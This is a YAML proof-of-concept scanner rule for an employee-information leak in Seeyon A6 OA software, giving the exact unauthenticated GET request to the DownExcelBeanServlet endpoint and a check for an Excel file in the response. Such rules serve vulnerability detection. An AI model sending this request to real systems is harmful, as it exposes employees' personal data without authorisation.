id: seeyon-a6-employee-info-leak

info:
    name: seeyon-a6-employee-info-leak
    author: sakura404x
    severity: high
    reference:
        - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md

rules:
    poc10:
        request:
            method: GET
            path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
        expression: response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet")
expression: poc10()

